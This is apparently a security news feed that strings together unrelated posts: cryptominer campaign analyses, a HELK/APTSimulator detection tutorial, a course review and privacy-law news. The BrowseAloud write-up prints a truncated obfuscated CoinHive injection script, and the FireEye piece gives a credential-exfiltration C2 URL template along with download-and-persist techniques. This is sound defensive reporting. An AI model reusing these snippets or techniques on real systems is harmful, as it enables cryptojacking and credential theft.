Running this tool will create a directory for each search term provided at the command-line. To search for a sentence, or to include multiple terms, enclose the argument with quotes. Due to Twitter’s rate limiting, your search may hit a limit, and need to pause to wait for the rate limit to reset. Luckily twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Since pytorch is gaining a lot of interest, I ran my script against that search term. Here’s some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.


Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!

They Stole My Shoes – Paul’s Security Weekly #548

This week, Steve Tcherchian, CISO and Director of Product Management of XYPRO Technology joins us for an interview! In our second feature interview, Paul speaks with Michael Bazzell, OSINT & Privacy Consultant! In the news, we have updates from Google, Bitcoin, NSA, Microsoft, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.

If the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.

After all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to hog the CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.


Use of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We’ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name




Indicators of Compromise





















Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Happy Valentine’s Day – Enterprise Security Weekly #80

This week, Paul and John are accompanied by Guy Franco, Security Consultant for Javelin Networks, who will deliver a Technical Segment on Domain Persistence! In the news, we have updates from ServerSide, Palo Alto, NopSec, Microsoft, and more on this episode of Enterprise Security Weekly!  


Full Show Notes:


Visit for all the latest episodes!

CFTC Brings Cybersecurity Enforcement Action

On February 12, 2018, in a settled enforcement action, the U.S. Commodity Futures Trading Commission (“CFTC”) charged a registered futures commission merchant (“FCM”) with violations of CFTC regulations relating to an ongoing data breach. Specifically, the FCM failed to diligently supervise an information technology provider’s (“IT vendor’s”) implementation of certain provisions in the FCM’s written information systems security program. Though not unprecedented, this case represents a rare CFTC enforcement action premised on a cybersecurity failure at a CFTC-registered entity.

According to the CFTC, a defect in a network-attached storage device installed by the FCM’s IT vendor left unencrypted customers’ records and other information stored on the device unprotected from cyber-exploitation. The defect left the information unprotected for nearly 10 months and led to the compromise of this data after the FCM’s network was accessed by an unauthorized, unaffiliated third party. The IT vendor failed to discover the vulnerability in subsequent network risk assessments, notwithstanding the fact that the unauthorized third party had blogged about exploiting the vulnerability at other companies. The FCM did not learn about the breach of its systems until directly contacted by the third party.

The CFTC charged the FCM under Regulation 166.3, which requires that every CFTC registrant “diligently supervise the handling [of confidential information] by its partners, officers, employees and agents,” and Regulation 160.30, which requires all FCMs to “adopt policies and procedures that address administrative, technical and physical safeguards for the protection of customer records and information.” The CFTC noted that an FCM may delegate the performance of its information systems security program’s technical provisions, including those relevant here. But in contracting with an IT vendor as its agent to perform these services, the FCM cannot abdicate its responsibilities under Regulation 166.3, and must diligently supervise the IT vendor’s handling of all activities relating to the registered entity’s business as a CFTC registrant.

To settle the case, the FCM agreed to (1) pay a $100,000 civil monetary penalty and (2) cease and desist from future violations of Regulation 166.3. The CFTC noted the FCM’s cooperation during the investigation and agreed to reduce sanctions as a result.

IDG Contributor Network: How to ensure that giving notice doesn’t mean losing data

Most IT teams invest resources to ensure data security when onboarding new employees. You probably have a checklist that covers network access and permissions, access to data repositories, security policy acknowledgement, and maybe even security awareness education. But how robust is your offboarding security checklist? If you’re just collecting a badge and disabling network and email access on the employee’s last day, you’re not doing enough to protect your data.

Glassdoor reported recently that 35% of hiring decision makers expect more employees to quit in 2018 compared to last year. Whether through malicious intent or negligence, when insiders leave, there’s a risk of data leaving with them. To ensure data security, you need to develop and implement a robust offboarding process.

To read this article in full, please click here

This Is An Emergency – Business Security Weekly #73

This week, Michael and Paul interview Dawn-Marie Hutchinson, Executive Director of Optiv Offline! In the Article Discussion, security concern pushing IT to channel services, what drives sales growth and repeat business, and in the news, we have updates from Proofpoint, J2 Global, LogMeIn, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

FTC Releases PrivacyCon 2018 Agenda

On February 6, 2018, the Federal Trade Commission (“FTC”) released its agenda for PrivacyCon 2018, which will take place on February 28. Following recent FTC trends, PrivacyCon 2018 will focus on privacy and data security considerations associated with emerging technologies, including the Internet of Things, artificial intelligence and virtual reality. The event will feature four panel presentations by over 20 researchers, including (1) collection, exfiltration and leakage of private information; (2) consumer preferences, expectations and behaviors; (3) economics, markets and experiments and (4) tools and ratings for privacy management. The FTC’s press release emphasizes the event’s focus on the economics of privacy, including “how to quantify the harms that result when companies fail to secure consumer information, and how to balance the costs and benefits of privacy-protective technologies and practices.”

PrivacyCon 2018, which is free and open to the public, will take place at the Constitution Center conference facility in Washington, D.C. The event will also be webcast on the FTC website and live tweeted using the hashtag #PrivacyCon18.

Jim Carrey Hacked My Facebook – Application Security Weekly #05

This week, Keith and Paul continue to discuss OWASP Application Security Verification Standard! In the news, Cisco investigation reveals ASA vulnerability is worse than originally thought, Google Chrome HTTPS certificate apocalypse, Intel made smart glasses that look normal, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

IDG Contributor Network: 7 ways to stay safe online on Valentine’s Day

Valentine’s Day brings out the softer side in all of us and often plays on our quest for love and appreciation. Online scammers know that consumers are more open to accepting cards, gifts and invitations all in the name of the holiday. While our guards are down, here are a few tips for safeguarding yourself while on your quest to find love on the Internet.

1. Darker side of dating websites

Unfortunately, dating websites — and modern dating apps — are a hunting ground for hackers. There is a peak of online dating activity between New Year’s and Valentine’s Day and cybercriminals are ready to take advantage of the the increased action on popular dating websites like Tinder, OKCupid, Plenty of Fish, and many others. Rogue adverts and rogue profiles are two of the biggest offenders. For example, many are skeptical of unsolicited advertisements via email. Therefore, spammers have moved to popular websites, including dating and adult sites, to post rogue ads and links. In August 2015, Malwarebytes detected malvertising attacks on PlentyOfFish, which draws more than three million daily users. Just a few months later, the U.K. version of online dating website was also caught serving up malvertising.

To read this article in full, please click here

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. Battle!

Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not undervalue these two offerings.
HELK is incredibly easy to install. Its also well documented, with lots of related reading material, let me propose that you take the tine to to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone
  • cd HELK/
  • sudo ./ 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you, if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["","",""]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2:
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executes nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM.

Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline,, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month, I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto consider HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advance Solutions as well, there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

2018-02-10_ITT.pngFor starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financials Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their name, address, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

2018-02-10_RiskScoresA federal indictment charging 36 individuals for their role in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

Under the slogan, “In Fraud We Trust,” the organization directed traffic and potential purchasers to the automated vending sites of its members, which served as online conduits to traffic in stolen means of identification, stolen financial and banking information, malware, and other illicit goods.  It also provided an escrow service to facilitate illicit digital currency transactions among its members and employed screening protocols that purported to ensure only high quality vendors of stolen cards, personally identifiable information, and other contraband were permitted to advertise to members.

ABC News reported that investigators believe the group’s nearly 11,000 members targeted more than 4.3 million credit cards, debit cards, and bank accounts worldwide. Over its seven-year history, the group inflicted $2.2 billion in intended losses and more than $530 million in actual losses against a wide range of financial institutions, merchants, and individuals.


Trust Me, I am a Screen Reader, not a CryptoMiner

Until late Sunday afternoon, a number of public sector websites including ICO, NHS, and local councils (for example, Camden in London) have been serving a crypto miner unbeknownst to visitors, turning them into a free computing cloud at the service of unknown hackers. Although initially only UK sites were particularly affected, subsequent reports included Ireland and US websites as well.


Figure 1: BrowseAloud accessibility tool.

While initially researchers considered the possibility of a new vulnerability exploited at large, Scott Helme ( quickly identified the culprit in a foreign JavaScript fragment added to the BrowseAloud (see Figure 1) JavaScript file (https://wwwbrowsealoud[.]com/plus/scripts/ba.js), an accessibility tool used by all the affected websites:

\x69\x66 \x28\x6e\x61\x76\x69\x67\x61\x74\x6f\x72\x2e\x68\x61\x72\x64\x77\x61\x72\x65\x43\x6f\x6e\x63\x75\x72\x72
\x65\x6e\x63\x79 \x3e \x31\x29\x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x30\x2e\x36\x7d\x7d \x65\x6c\x73\x65 \x7b \x76\x61\x72 \x63\x70\x75\x43\x6f\x6e\x66\x69\x67 \x3d 
\x7b\x74\x68\x72\x65\x61\x64\x73\x3a \x38\x2c\x74\x68\x72\x6f\x74\x74\x6c\x65\x3a\x30\x2e\x36\x7d\x7d 
\x76\x61\x72 \x6d\x69\x6e\x65\x72 \x3d \x6e\x65\x77 

Compromising a third-party tool JavaScript is no small feat, and it allowed deployment of the code fragment on thousands of unaware websites (here a comprehensive list of websites using BrowseAloud to provide screen reader support and text translation services:

To analyze the obfuscated code we loaded one of the affected websites (Camden Council) into our instrumented web browser (Figure 2) and extracted the clear text.

Figure 2: the web site Camden Council as analyzed by Lastline instrumented web browser.

As it turns out, it is an instance of the well-known and infamous CoinHive, mining the Monero cryptocurrency:

<script> if (navigator.hardwareConcurrency > 1){ var cpuConfig = {threads: 
Math.round(navigator.hardwareConcurrency/3),throttle:0.6}} else { var cpuConfig = 
{threads: 8,throttle:0.6}} var miner = new 

Unlike Bitcoin wallet addresses, CoinHive site keys do not allow balance checks, making impossible to answer the question of how much money the attackers managed to make in this heist. On the other hand, quite interestingly, the very same CoinHive key did pop up on Twitter approximately one week ago (; context on this is still not clear, and we will update the blog post as we know more.

As of now (16:34) the company behind BrowseAloud, Texthelp, removed the JavaScript from their servers (as a preventive measure the browsealoud[.]com domain has also been set to resolve to NXDOMAIN) effectively putting a stop to this emergency by disabling the BrowseAloud tool altogether. But when did it start, and most importantly how did it happen?

Figure 3: S3 object metadata.

Marco Cova one of our senior researchers here at Lastline, quickly noticed that the BrowseAloud JavaScript files were hosted on an S3 bucket (see Figure 3 above).

In particular the last modified time of the ba.js resource showed 2018-02-11T11:14:24 making this Sunday morning UK time the very first moment this specific version of the JavaScript had been served.

Figure 4: S3 object permissions.

Although it’s not possible to know for certain (only our colleagues at Texthelp can perform this investigation) it seems possible that attackers may have managed to modify the object referencing the JavaScript file by taking advantage of weak S3 permissions (see Figure 4). Unfortunately we cannot pinpoint the exact cause as we do not have at our disposal all permissions records for the referenced S3 bucket.

Considering the number of components involved in a website on average, it might be concerning to see that a single compromise managed to affect so many websites. As Scott Helme noticed however, we should be aware that technologies able to thwart this kind of attacks exist already: in particular, if those websites had implemented CSP (Content Security Policy) to mandate the use of SRI (Subresource Integrity), any attempt to load a compromised JavaScript would have failed, sparing thousands of users the irony of mining cryptocurrency for unknown hackers, while looking to pay their council tax.

The post Trust Me, I am a Screen Reader, not a CryptoMiner appeared first on Lastline.

Tips to improve IoT security on your network

Judging by all the media attention that The Internet of Things (or IoT) gets these days, you would think that the world was firmly in the grip of a physical and digital transformation. The truth, though, is that we all are still in the early days of the IoT.

The analyst firm Gartner, for example, puts the number of Internet connected “things” at just 8.4 billion in 2017 – counting both consumer and business applications. That’s a big number, yes, but much smaller number than the “50 billion devices” or “hundreds of billions of devices” figures that get bandied about in the press.

To read this article in full, please click here

(Insider Story)

Walk The Plank – Paul’s Security Weekly #547

This week, Zane Lackey of Signal Sciences joins us for an interview! Our very own Larry Pesce delivers the Technical Segment on an intro to the ESP8266 SoC! In the news, we have updates from Bitcoin, NSA, Facebook, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Dark Side Ops I & 2 Review

Dark Side Ops I 

 A really good overview of the class is here

I enjoyed the class. This was actually my second time taking the class and it wasn't nearly as overwhelming the 2nd time :-)

 I’ll try not to cover what is in Raphael’s article as it is still applicable and I am assuming you read it before continuing on.

I really enjoyed the VisualStudio time and building Slingshot and Throwback myself along with getting a taste for extending the  implant by adding the keylogger, mimikatz, and hashdump modules.

Windows API developers may be able to greatly extend slingshot but I don't think I have enough WinAPI kung fu to do it and there wasn’t enough setup around the “how” to consistently do it either unless you have a strong windows API background. However, one of the labs consisted of adding load and run powershell functionality which allows you to make use of the plethora of powershell code out there.

There was also a great lab where we learned how to pivot through a compromised SOHO router and the technique could also be extended for VPS or cloud providers.

Cons of the class.

The visual studio piece can get overwhelming but it definitely gives you a big taste of (Windows) implant development.  The class material are getting slightly dated in some cases.  A refresh might be helpful.  More Throwback usage & development would be fun (even as optional labs).


Lab one was getting a fresh copy of slingshot back up and running and then setting up some additional code to do a powershell web cradle to get our slingshot implant up and running on a remote host. Similar to how metasploit web delivery does things.

Lab 2 was doing some devops to set up servers, OpenVPN to tunnel traffic, and adding HTTPS to our slingshot codebase.

Lab 3 was some Initial activity labs (HTA and chrome plugin exploitation)

Lab 4 was tweaking our HTA to defeat some common detections and protections. We also worked on code to do sandbox evasions as it’s becoming more common for automated sandbox solutions to be tied to mail gateways or  just for people doing response.

Lab 5 whitelist bypassing

Lab 6 was doing some profiling via powershell and using slingshot to be able to do checks on the host

Labs 7-9 building a kernel rootkit

Lab 10 persistence via COM Hijacking and hiding our custom DLL in the registry and Lab 11 was privilege escalation via custom service.

Final Thoughts

I enjoyed the four days and felt like I learned a lot. So the TLDR is that I recommend taking the class(es).

I think the set of courses are having a bit of an identity crisis mostly due to the 2 day
format and would be a much better class as a 5 day.  It is heavy development focused meaning you
spend a lot of time in Visual Studio tweaking C code. The “operations” piece  of the course definitely
suffers a bit due to all the dev time. There was minimal talk around lateral movement and the whole
thing is entirely Windows focused so no Linux and no OSX.  A suggestion to fix the “ops” piece
would be to have a Dark Side Ops - Dev and Dark Side Ops - Operator courses where the dev one
is solely deving your implant and the Operator course would be solely using the implant you dev’d
(or was provided to you).  The Silent Break team definitely knows their stuff and a longer class
format or switch up would allow them to showcase that more efficiently.

GDPR Material and Territorial Scopes

The new EU General Data Regulation will enter into force 25 May of this year. The GDPR contains rules concerning the protection of natural persons when their personal data are processed and rules on the free movement of personal data. The new regulation is not revolutionary but an evolution from the previous Data Protection Act 1998 […]

Head of Austrian DPA Appointed Chair of Article 29 Working Party

On February 7, 2018, representatives of European Data Protection Authorities (“DPAs”) met in Brussels to appoint the new leader of the current Article 29 Data Protection Working Party (the “Working Party”). Andrea Jelinek, head of the Austrian DPA, was elected to the post and will replace Isabelle Falque-Pierrotin, leader of the French DPA, who has represented the Working Party over the past four years.

Jelinek, running for the position against head of the Bulgarian DPA, Ventsislav Karadjov, won by a majority of votes and will assume the role in the coming months.

After the EU GDPR becomes directly applicable on May 25, 2018, the Working Party will be replaced by the new European Data Protection Board, and it is highly likely that Jelinek will be reconfirmed as its inaugural leader.

Austria is one of only two EU member states, the other being Germany, that has fully adapted its national privacy laws to be in line with the GDPR ahead of the May 2018 deadline.

Heinous Noises – Enterprise Security Weekly #79

This week, Paul is joined by Doug White, host of Secure Digital Life, to interview InfoSecWorld 2018 Speaker Summer Fowler! In the news, we have updates from Cisco, SANS, Scarab, and more on this episode of Enterprise Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

FTC Brings Its Thirtieth COPPA Case, Against Online Talent Agency

On February 5, 2018, the Federal Trade Commission (“FTC”) announced its most recent Children’s Online Privacy Protection Act (“COPPA”) case against Explore Talent, an online service marketed to aspiring actors and models. According to the FTC’s complaint, Explore Talent provided a free platform for consumers to find information about upcoming auditions, casting calls and other opportunities. The company also offered a monthly fee-based “pro” service that promised to provide consumers with access to specific opportunities. Users who registered online were asked to input a host of personal information including full name, email, telephone number, mailing address and photo; they also were asked to provide their eye color, hair color, body type, measurements, gender, ethnicity, age range and birth date.

